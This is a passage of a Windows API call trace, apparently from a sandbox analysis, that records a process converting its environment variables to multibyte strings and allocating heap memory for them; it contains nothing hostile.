CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x68ef00, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0097.512] GetLastError () returned 0x0 [0097.513] SetLastError (dwErrCode=0x0) [0097.513] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4) returned 0x6910d0 [0097.513] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6910d0) returned 0x4 [0097.513] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6910d0, Size=0x8) returned 0x6910d0 [0097.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0097.513] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x36) returned 0x6910e0 [0097.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x6910e0, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0097.513] GetLastError () returned 0x0 [0097.513] SetLastError (dwErrCode=0x0) [0097.513] GetLastError () returned 0x0 [0097.513] SetLastError (dwErrCode=0x0) [0097.513] GetLastError () returned 0x0 [0097.513] SetLastError (dwErrCode=0x0) [0097.522] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6910d0) returned 0x8 [0097.522] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6910d0, Size=0xc) returned 0x691120 [0097.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0097.522] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x37) returned 0x691138 [0097.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x691138, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0097.522] GetLastError () returned 0x0 [0097.522] SetLastError (dwErrCode=0x0) [0097.522] GetLastError () returned 0x0 [0097.522] SetLastError (dwErrCode=0x0) [0097.522] GetLastError () returned 0x0 [0097.522] SetLastError (dwErrCode=0x0) [0097.522] GetLastError () returned 0x0 [0097.522] SetLastError (dwErrCode=0x0) [0097.522] GetLastError () returned 0x0 [0097.522] SetLastError (dwErrCode=0x0) [0097.522] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691120) returned 0xc [0097.522] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691120, Size=0x10) returned 0x691120 [0097.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0097.522] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3c) returned 0x6856f8 [0097.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6856f8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0097.523] GetLastError () returned 0x0 [0097.523] SetLastError (dwErrCode=0x0) [0097.523] GetLastError () returned 0x0 [0097.523] SetLastError (dwErrCode=0x0) [0097.523] GetLastError () returned 0x0 [0097.523] SetLastError (dwErrCode=0x0) [0097.523] GetLastError () returned 0x0 [0097.523] SetLastError (dwErrCode=0x0) [0097.523] GetLastError () returned 0x0 [0097.523] SetLastError (dwErrCode=0x0) [0097.523] GetLastError () returned 0x0 [0097.523] SetLastError (dwErrCode=0x0) [0097.523] GetLastError () returned 0x0 [0097.523] SetLastError (dwErrCode=0x0) [0097.523] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691120) returned 0x10 [0097.523] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691120, Size=0x14) returned 0x691178 [0097.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0097.523] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x31) returned 0x691198 [0097.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x691198, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0097.523] GetLastError () returned 0x0 [0097.523] SetLastError (dwErrCode=0x0) [0097.523] GetLastError () returned 0x0 [0097.523] SetLastError (dwErrCode=0x0) [0097.523] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691178) returned 0x14 [0097.524] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691178, Size=0x18) returned 0x691178 [0097.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0097.524] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x17) returned 0x6911d8 [0097.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6911d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0097.524] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] GetLastError () returned 0x0 [0097.524] SetLastError (dwErrCode=0x0) [0097.524] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691178) returned 0x18 [0097.525] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691178, Size=0x1c) returned 0x6911f8 [0097.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0097.525] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x24) returned 0x68a9a0 [0097.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x68a9a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0097.525] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] GetLastError () returned 0x0 [0097.525] SetLastError (dwErrCode=0x0) [0097.525] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] GetLastError () returned 0x0 [0097.526] SetLastError (dwErrCode=0x0) [0097.526] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6911f8) returned 0x1c [0097.526] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6911f8, Size=0x20) returned 0x6911f8 [0097.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.526] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x14) returned 0x691178 [0097.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x691178, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.527] SetLastError (dwErrCode=0x0) [0097.527] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.528] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.528] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.528] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6911f8) returned 0x20 [0097.528] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6911f8, Size=0x24) returned 0x6911f8 [0097.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.528] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xd) returned 0x68e640 [0097.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x68e640, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0097.528] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.528] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.528] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.528] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.528] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.528] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.528] GetLastError () returned 0x0 [0097.528] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] GetLastError () returned 0x0 [0097.529] SetLastError (dwErrCode=0x0) [0097.529] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6911f8) returned 0x24 [0097.529] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6911f8, Size=0x28) returned 0x6911f8 [0097.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0097.529] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x25) returned 0x68a9d0 [0097.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x68a9d0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.530] SetLastError (dwErrCode=0x0) [0097.530] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6911f8) returned 0x28 [0097.531] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6911f8, Size=0x2c) returned 0x6911f8 [0097.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0097.531] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x39) returned 0x685740 [0097.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x685740, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0097.531] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] GetLastError () returned 0x0 [0097.531] SetLastError (dwErrCode=0x0) [0097.531] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.532] SetLastError (dwErrCode=0x0) [0097.532] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.533] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.533] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.533] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.533] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.533] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.533] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6911f8) returned 0x2c [0097.533] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6911f8, Size=0x30) returned 0x6911f8 [0097.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0097.533] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x18) returned 0x691230 [0097.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x691230, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0097.533] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.533] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.533] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.533] GetLastError () returned 0x0 [0097.533] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.534] GetLastError () returned 0x0 [0097.534] SetLastError (dwErrCode=0x0) [0097.535] GetLastError () returned 0x0 [0097.535] SetLastError (dwErrCode=0x0) [0097.535] GetLastError () returned 0x0 [0097.535] SetLastError (dwErrCode=0x0) [0097.535] GetLastError () returned 0x0 [0097.535] SetLastError (dwErrCode=0x0) [0097.535] GetLastError () returned 0x0 [0097.535] SetLastError (dwErrCode=0x0) [0097.535] GetLastError () returned 0x0 [0097.535] SetLastError (dwErrCode=0x0) [0097.535] GetLastError () returned 0x0 [0097.535] SetLastError (dwErrCode=0x0) [0097.535] GetLastError () returned 0x0 [0097.535] SetLastError (dwErrCode=0x0) [0097.535] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x6911f8) returned 0x30 [0097.535] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x6911f8, Size=0x34) returned 0x691250 [0097.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0097.536] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x17) returned 0x6911f8 [0097.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x6911f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.536] GetLastError () returned 0x0 [0097.536] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.537] SetLastError (dwErrCode=0x0) [0097.537] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.538] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.538] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x691250) returned 0x34 [0097.538] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x691250, Size=0x38) returned 0x691250 [0097.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.538] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xe) returned 0x68e658 [0097.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x68e658, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0097.538] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.538] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.538] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.538] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.538] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.538] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.538] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.538] GetLastError () returned 0x0 [0097.538] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError (dwErrCode=0x0) [0097.539] GetLastError () returned 0x0 [0097.539] SetLastError 